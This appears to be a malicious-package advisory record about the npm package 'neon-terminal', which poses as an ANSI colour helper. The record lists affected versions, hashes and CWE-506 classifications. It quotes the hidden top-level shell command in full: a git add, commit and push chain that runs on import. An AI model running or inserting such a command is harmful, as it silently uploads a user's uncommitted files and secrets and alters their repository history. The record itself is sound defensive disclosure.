-= Per source details. Do not edit below this line.=-
neon-terminal advertises itself as an ANSI color helper but its CJS entry (dist/index.cjs) and ESM entry (src/index.js) each execute a shell command at top level, so the code fires on require('neon-terminal') or import 'neon-terminal'. The command runs pwd && ls -la && git status && git add. && git commit -m "sync" && git push -u origin main in the consumer's current working directory. When loaded inside a project that is a git repository, this stages every local file (including untracked/uncommitted files that may contain secrets, credentials, or in-progress code), creates a commit under the installer's git identity, and pushes to whatever origin remote is configured. The behavior is undocumented, ungated, and unrelated to the package's advertised purpose. Consequences on the installer: (1) unauthorized commits to the installer's repository under the installer's identity; (2) exfiltration of local, previously-uncommitted files to the configured remote (which may be a public or third-party-visible repo); (3) destructive mutation of git history / branch state without consent.
{
"malicious-packages-origins": [
{
"import_time": "2026-07-06T03:12:34.469263609Z",
"source": "amazon-inspector",
"sha256": "7dd6cb5ae779e1f3c5e78cd62c7d4abce2254f01cadc465ae31a66c890d4aedc",
"versions": [
"0.3.0"
],
"id": "IN-MAL-2026-007966",
"modified_time": "2026-07-06T03:08:14Z"
},
{
"import_time": "2026-07-06T03:12:34.368395179Z",
"source": "amazon-inspector",
"sha256": "a013b6f123489f4d4cde454e5fa9474d414c5d96ca2fb4b591bd3f251d965444",
"versions": [
"0.7.0"
],
"id": "IN-MAL-2026-007963",
"modified_time": "2026-07-06T03:07:46Z"
},
{
"import_time": "2026-07-06T03:12:34.303936388Z",
"source": "amazon-inspector",
"sha256": "bf36bf768a99a85796b17f9326d27d12fddac725163d9055f64fd40f6e32db16",
"versions": [
"0.9.0"
],
"id": "IN-MAL-2026-007962",
"modified_time": "2026-07-06T03:07:38Z"
},
{
"import_time": "2026-07-06T03:12:34.276346885Z",
"source": "amazon-inspector",
"sha256": "f2a8571e415ee8e20ec04bcf7fa8d689dc02840d931ff569a1f3ed72aa75e731",
"versions": [
"0.4.0"
],
"id": "IN-MAL-2026-007961",
"modified_time": "2026-07-06T03:07:29Z"
},
{
"import_time": "2026-07-06T03:12:34.439804244Z",
"source": "amazon-inspector",
"sha256": "f4ef60c657027edd1662f32277b50604b6162461924cebd4ed71e3e73b1e87e5",
"versions": [
"0.6.0"
],
"id": "IN-MAL-2026-007965",
"modified_time": "2026-07-06T03:08:05Z"
},
{
"import_time": "2026-07-06T03:12:34.396028078Z",
"source": "amazon-inspector",
"sha256": "fe20cb398df96930eff1a5c4f708fdf9b96c449f29958a6103bb2648a4e5b759",
"versions": [
"0.5.0"
],
"id": "IN-MAL-2026-007964",
"modified_time": "2026-07-06T03:07:56Z"
},
{
"import_time": "2026-07-06T03:12:34.497658844Z",
"source": "amazon-inspector",
"sha256": "fe8b090e304f95042a17db9e22edef03d8cdd073a214806e8aa3ebe7b2d138f9",
"versions": [
"0.2.0"
],
"id": "IN-MAL-2026-007967",
"modified_time": "2026-07-06T03:08:22Z"
}
]
}"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/neon-terminal/MAL-2026-6793.json"
[
{
"name": "Embedded Malicious Code",
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature."
},
{
"name": "Embedded Malicious Code",
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature."
},
{
"name": "Embedded Malicious Code",
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature."
},
{
"name": "Embedded Malicious Code",
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature."
},
{
"name": "Embedded Malicious Code",
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature."
},
{
"name": "Embedded Malicious Code",
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature."
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
}
]
{
"evidence_files": [
{
"tlsh": "554132e79de930110b9284b0e019a043abe959345113f2bcfcfaa6389fcd664c171fb4",
"sha256": "f9fceeebc3cb72d79983c800770fb730f0a63c3d3e48b489b488f5efdb7e6a0f",
"path": "cjs/src/index.js"
},
{
"tlsh": "da4114eb9dd921100aa24474e419e003579d19346217f2bcfcfaa2385edc668c172fb8",
"sha256": "72a4853d83ff776dd3ebd2fb692394a7042aa01d1c3e236fb619db221a92c186",
"path": "src/index.js"
},
{
"tlsh": "8201de11ccae0e2312c96a24dd5a4642d071882b4854be0e33ea527c4b9c9ef20fe75e",
"sha256": "cccd6e4654b872c88d1271fd0a0ae213bbf5ff1aedffd8c79672060a78cca37e",
"path": "package.json"
}
],
"package_integrity": [
{
"filename": "neon-terminal-0.3.0.tgz",
"hashes": {
"sha1": "6d102bdda39373cbe2200f2acb2764ca42fe4a1c",
"sha512_sri": "sha512-ccm8SwLkfJfFmwSZqGkquK/CIlfoJ74vTrOdjTZNVDHSAfxZjUTuf7aehP1mV7s9rnqrkoY/HktW4PSxntdSVA=="
}
}
]
}